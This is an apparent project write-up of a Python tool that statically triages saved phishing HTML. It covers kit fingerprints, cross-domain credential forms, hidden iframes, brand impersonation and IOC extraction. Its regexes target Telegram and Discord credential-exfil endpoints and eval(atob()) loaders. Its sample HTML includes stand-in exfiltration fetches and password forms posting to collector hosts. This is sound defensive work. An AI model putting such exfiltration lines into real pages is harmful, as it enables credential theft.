Python · Threat Intelligence

PhishKit Analyzer — Static triage for phishing HTML artifacts

A static analysis tool that fingerprints phishing kits, identifies credential harvesting forms, detects brand impersonation, and extracts blocklist-ready IOCs from a saved HTML file.

python phishing threat-intel reverse-engineering web-security


PhishKit Analyzer

Static triage for phishing HTML artifacts — finds kit fingerprints, credential harvesting forms, and embedded IOCs without ever loading the page in a browser.

The Goal

When a phishing report lands — a forwarded page, a suspicious URL from a user, a sample pulled from a threat feed — I want three things answered fast:

Is this from a known kit, or hand-rolled?
Where do the credentials actually go?
What URLs, IPs, and domains do I need to block right now?

Most tools in this space execute the page, spin up a browser, or require a full sandbox. That's overkill for triage, and it creates its own risk. PhishKit Analyzer is designed to be the five-minute pass: give it a saved HTML file, get back a scored report and a list of IOCs.

How It Works

The analyzer parses the raw HTML through BeautifulSoup and runs a series of independent detection passes over the document tree and the raw text. Each pass produces zero or more RiskFactor records, each carrying a name, a severity weight, and a human-readable detail string. The final score is the sum of all matched weights, capped at 100.
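A minimal sketch of the scoring model described above. The `RiskFactor` fields follow the description (name, weight, detail); the helper name `total_score` and the specific weights are illustrative assumptions, not the tool's actual values.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskFactor:
    name: str    # short identifier, e.g. "telegram_exfil"
    weight: int  # severity weight contributed to the score
    detail: str  # human-readable explanation


def total_score(factors: list[RiskFactor], cap: int = 100) -> int:
    """Sum the weights of all matched factors and clamp the result to `cap`."""
    return min(cap, sum(f.weight for f in factors))


# Hypothetical weights, chosen only to show the cap taking effect.
factors = [
    RiskFactor("credential_form", 30, "password input found in a <form>"),
    RiskFactor("cross_domain_post", 40, "form action host differs from page host"),
    RiskFactor("telegram_exfil", 50, "Telegram bot API URL in raw HTML"),
]
print(total_score(factors))  # 30 + 40 + 50 = 120, capped to 100
```

Because each pass only appends records, a new detection can be added without touching the scoring code.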

The analysis pipeline:

Kit fingerprint matching — regex patterns scanned against the raw HTML string
Credential form detection — finds <form> tags with password inputs, then checks whether the form action POSTs credentials cross-domain
Hidden iframe detection — inspects <iframe> elements for display:none, visibility:hidden, or pixel-sized dimensions
Brand impersonation check — compares the page <title> against a list of major brands; flags when the title references a brand the page domain doesn't contain
IOC extraction — regex sweeps for all URLs, IPv4 addresses, and domains in the document

The tool defaults to operating on local files. Fetching a live URL requires an explicit --fetch flag per invocation — phishing pages can drop payloads even on programmatic fetches, so the safe default is to refuse.
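The refuse-by-default behavior could be wired up roughly like this with `argparse`. Only the `--fetch` flag and the `phishkit` program name come from this write-up; the positional `target` argument and the helper names are assumptions made for the sketch.

```python
import argparse
from urllib.parse import urlparse


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(prog="phishkit")
    parser.add_argument("target", help="path to a saved HTML file, or a URL with --fetch")
    # store_true defaults to False, so every run is offline unless told otherwise.
    parser.add_argument("--fetch", action="store_true",
                        help="allow a live HTTP fetch for this invocation only")
    return parser


def is_url(target: str) -> bool:
    return urlparse(target).scheme in ("http", "https")


def resolve_source(target: str, fetch: bool) -> str:
    """Return "file" or "url", refusing URLs unless --fetch was passed."""
    if is_url(target):
        if not fetch:
            raise PermissionError("refusing to fetch a live URL without --fetch")
        return "url"
    return "file"


args = build_parser().parse_args(["sample.html"])
print(resolve_source(args.target, args.fetch))  # file
```

Nothing is read from a config file or environment variable here, which is what keeps the opt-in scoped to a single invocation.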

What It Extracts

Kit fingerprints — patterns drawn from publicly documented kits:

Fingerprint	What it catches
`16shop_marker`	Literal kit string from 16shop campaigns
`16shop_path`	Common 16shop admin PHP paths
`telegram_exfil`	Telegram bot API credential exfil endpoint
`discord_webhook`	Discord webhook credential exfil
`antibot_marker`	Anti-bot JS function bundled with many kits
`blocked_country_check`	Geo-block config strings used to evade researcher IPs
`obfuscated_eval`	`eval(atob(...))` and similar decode-and-execute patterns
`redirect_to_legit`	Post-capture redirect to a real brand domain
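A sketch of how a raw-text fingerprint pass might look. The fingerprint names come from the table above, but the regular expressions are my own approximations for illustration, not the patterns the tool ships with.

```python
import re

# Hypothetical patterns; real kit signatures would need tuning against samples.
FINGERPRINTS: dict[str, re.Pattern[str]] = {
    "telegram_exfil": re.compile(r"api\.telegram\.org/bot[\w:-]+/sendMessage", re.I),
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I),
    "obfuscated_eval": re.compile(r"eval\s*\(\s*(?:atob|unescape)\s*\(", re.I),
}


def match_fingerprints(raw_html: str) -> list[str]:
    """Return the sorted names of all fingerprints found in the raw HTML string."""
    return sorted(name for name, pattern in FINGERPRINTS.items() if pattern.search(raw_html))


sample = """
<script>eval(atob("YWxlcnQoMSk="));</script>
<script>fetch("https://api.telegram.org/bot123456:ABC-def/sendMessage?chat_id=1")</script>
"""
print(match_fingerprints(sample))  # ['obfuscated_eval', 'telegram_exfil']
```

Scanning the raw string rather than the parsed tree means markers inside inline scripts and comments are still seen.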

Credential form signals — whether a password form is present, and whether credentials are being POSTed to an external host rather than the page's own domain.
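The credential form check can be sketched as follows. The function name, the `page_url` parameter, the returned dictionary keys, and the choice of the `html.parser` backend are assumptions; the comparison here is an exact host match, so a stricter or looser notion of "same domain" would need extra logic.

```python
import re
from urllib.parse import urljoin, urlparse

from bs4 import BeautifulSoup

PASSWORD_TYPE = re.compile(r"^password$", re.I)


def find_credential_forms(html: str, page_url: str) -> list[dict]:
    """Return one record per <form> that contains a password input."""
    soup = BeautifulSoup(html, "html.parser")
    page_host = (urlparse(page_url).hostname or "").lower()
    results = []
    for form in soup.find_all("form"):
        if form.find("input", attrs={"type": PASSWORD_TYPE}) is None:
            continue
        # Resolve relative actions against the page URL; an empty action
        # resolves to the page itself.
        action = urljoin(page_url, form.get("action") or "")
        action_host = (urlparse(action).hostname or "").lower()
        results.append({
            "action": action,
            "method": (form.get("method") or "get").lower(),
            "cross_domain": action_host != page_host,
        })
    return results


html = (
    '<form action="https://collector.example.net/gate.php" method="POST">'
    '<input type="text" name="u"><input type="password" name="p"></form>'
    '<form action="/search"><input type="text" name="q"></form>'
)
for record in find_credential_forms(html, "https://login.example.org/index.html"):
    print(record)
```

Only the first form is reported, since the search form has no password input.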

Hidden iframes — cloaking technique used to load tracker or exfil frames invisibly.
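A rough sketch of the hidden iframe pass. It treats "pixel-sized" as a width or height of 0 or 1, which is my interpretation rather than a documented threshold; the function name and the `html.parser` backend are also assumptions.

```python
import re

from bs4 import BeautifulSoup

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY_SIZES = {"0", "1", "0px", "1px"}  # assumed meaning of "pixel-sized"


def find_hidden_iframes(html: str) -> list[str]:
    """Return the src of every iframe that is styled or sized to be invisible."""
    soup = BeautifulSoup(html, "html.parser")
    hidden = []
    for frame in soup.find_all("iframe"):
        style = frame.get("style") or ""
        width = (frame.get("width") or "").strip().lower()
        height = (frame.get("height") or "").strip().lower()
        if HIDDEN_STYLE.search(style) or width in TINY_SIZES or height in TINY_SIZES:
            hidden.append(frame.get("src") or "")
    return hidden


html = (
    '<iframe src="https://a.example/track" style="display: none"></iframe>'
    '<iframe src="https://b.example/px" width="1" height="1"></iframe>'
    '<iframe src="https://c.example/video" width="600" height="400"></iframe>'
)
print(find_hidden_iframes(html))  # ['https://a.example/track', 'https://b.example/px']
```

This only looks at inline attributes; frames hidden through a stylesheet class would need a separate check.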

Brand impersonation — page title says "Microsoft — Account Sign In" but the page's domain, for example login-verify-account.tld, does not contain the brand name.
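The title-versus-domain rule can be sketched as a plain substring comparison. The brand list and function name are illustrative assumptions. Note that a substring rule like this one will not flag a lookalike domain that embeds the brand name, so a stricter variant would compare against each brand's official domains instead.

```python
# Illustrative brand list; the tool's real list is not shown in this write-up.
BRANDS = ("microsoft", "paypal", "apple", "google", "amazon")


def impersonated_brands(title: str, page_domain: str) -> list[str]:
    """Return brands named in the title that do not appear in the page domain."""
    title_l = title.lower()
    domain_l = page_domain.lower()
    return [brand for brand in BRANDS if brand in title_l and brand not in domain_l]


print(impersonated_brands("Microsoft Account Sign In", "secure-login-check.example"))
# ['microsoft']
print(impersonated_brands("Microsoft Account Sign In", "login.microsoft.com"))
# []
```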

IOCs — all URLs, IPv4 addresses, and domains deduplicated and sorted, ready to paste into a SIEM or blocklist.

The output is available as a human-readable terminal report or as structured JSON for feeding into a SOAR pipeline.
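One way the JSON output could be produced from dataclasses. The `Report` class, its field names, and `to_json` are hypothetical names for this sketch; the actual schema is not documented here.

```python
import json
from dataclasses import asdict, dataclass, field


@dataclass
class RiskFactor:
    name: str
    weight: int
    detail: str


@dataclass
class Report:  # hypothetical container for one analysis run
    score: int
    factors: list[RiskFactor] = field(default_factory=list)
    urls: list[str] = field(default_factory=list)
    ips: list[str] = field(default_factory=list)
    domains: list[str] = field(default_factory=list)


def to_json(report: Report) -> str:
    # asdict() recurses into nested dataclasses, so factors become plain dicts.
    return json.dumps(asdict(report), indent=2, sort_keys=True)


report = Report(
    score=70,
    factors=[
        RiskFactor("cross_domain_post", 40, "action host differs from page host"),
        RiskFactor("credential_form", 30, "password input present"),
    ],
    domains=["collector.example.net"],
)
print(to_json(report))
```

Sorting the keys keeps the output stable between runs, which makes diffs and downstream parsing more predictable.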

Tech & Tools

Python 3.10+
BeautifulSoup 4 — HTML parsing and DOM traversal
re — raw-text regex passes for kit fingerprints and IOC extraction
urllib.parse — domain extraction from form actions and page URLs
python-whois (optional) — flags freshly registered domains on request
pyproject.toml packaging — installable as phishkit CLI entry point

The architecture is intentionally flat: analyzer.py holds the core logic as pure functions that take a string and return dataclasses. The CLI in cli.py handles I/O, flag parsing, and output formatting separately, which made unit testing straightforward — every detection function can be tested in isolation with a crafted HTML string.

What I Learned

On phishing kits specifically: Real kits are lazier than I expected. The 16shop and Telegram-exfil patterns are nearly verbatim strings left in the HTML — operators copy-paste kits without removing obvious markers. That makes static detection surprisingly reliable for known kits, even without executing any JavaScript.

On the cross-domain POST signal: A credential form that POSTs to a different host than the page it's on is almost never legitimate. Legitimate login forms post to the same domain or a known subdomain. When the action host diverges, it's either a kit's collection endpoint or a forwarding service. That single check adds more signal than I anticipated.

On safe analysis: The decision to make --fetch an explicit per-invocation opt-in rather than a setting you enable once was deliberate. Phishing pages occasionally include drive-by payloads that fire on any HTTP client, not just browsers. Making the safe behavior the default removes a footgun that would otherwise be easy to forget.

On parsing HTML you don't control: Phishing HTML is often malformed — broken tags, mismatched quotes, partial DOM trees from kit assembly errors. BeautifulSoup's error tolerance was essential; a strict parser would have missed real signals because the surrounding markup was broken.
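A small illustration of that tolerance, using markup with unquoted attributes and several unclosed tags. The sample HTML is invented for the sketch, and the built-in `html.parser` backend is an assumption; other backends may repair the tree differently.

```python
from bs4 import BeautifulSoup

# Deliberately broken: unquoted attributes, no </p>, no </form>, no </body>.
broken = """
<html><body>
<div class=wrap>
<form action='https://collector.example.net/post.php' method=post>
  <input type=text name=user>
  <input type=password name=pass>
  <p>Sign in to continue
</div>
"""

soup = BeautifulSoup(broken, "html.parser")
form = soup.find("form")
password = form.find("input", attrs={"type": "password"})

# The form and its password field are still reachable despite the damage.
print(form["action"], password["name"])
```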

On IOC extraction: A naive URL regex matches too aggressively — it pulls in image paths, CSS references, and CDN URLs that aren't useful IOCs. Filtering out well-known asset extensions and the page's own domain as a post-processing step dramatically reduced noise in the output.
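The extract-then-filter approach could look something like this. The regexes, the extension list, and the `page_domain` parameter are assumptions for illustration, not the tool's actual rules.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(rf"\b(?:{OCTET}\.){{3}}{OCTET}\b")
# Hypothetical list of asset extensions treated as noise.
ASSET_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".css", ".woff", ".woff2")


def extract_iocs(raw_html: str, page_domain: str) -> dict[str, list[str]]:
    """Collect URLs, IPv4 addresses, and domains, dropping assets and the page's own host."""
    urls, domains = set(), set()
    for url in URL_RE.findall(raw_html):
        try:
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
        except ValueError:
            continue  # malformed URL, e.g. a broken IPv6 literal
        if not host or host == page_domain.lower():
            continue
        if parsed.path.lower().endswith(ASSET_EXTENSIONS):
            continue
        urls.add(url)
        if not IPV4_RE.fullmatch(host):
            domains.add(host)
    ips = set(IPV4_RE.findall(raw_html))
    return {"urls": sorted(urls), "ips": sorted(ips), "domains": sorted(domains)}


sample = """
<img src="https://cdn.example.com/logo.png">
<link href="https://phish.example.org/style.css">
<form action="https://collector.example.net/gate.php">
<script>fetch("http://203.0.113.7/log?u=1")</script>
<a href="https://phish.example.org/next.html">
"""
print(extract_iocs(sample, "phish.example.org"))
```

In this sample the logo and stylesheet are dropped as assets or own-domain references, leaving only the collection endpoint and the bare IP address. The IPv4 pattern will also match dotted version strings, so a real pass would likely want an allowlist or context check on top.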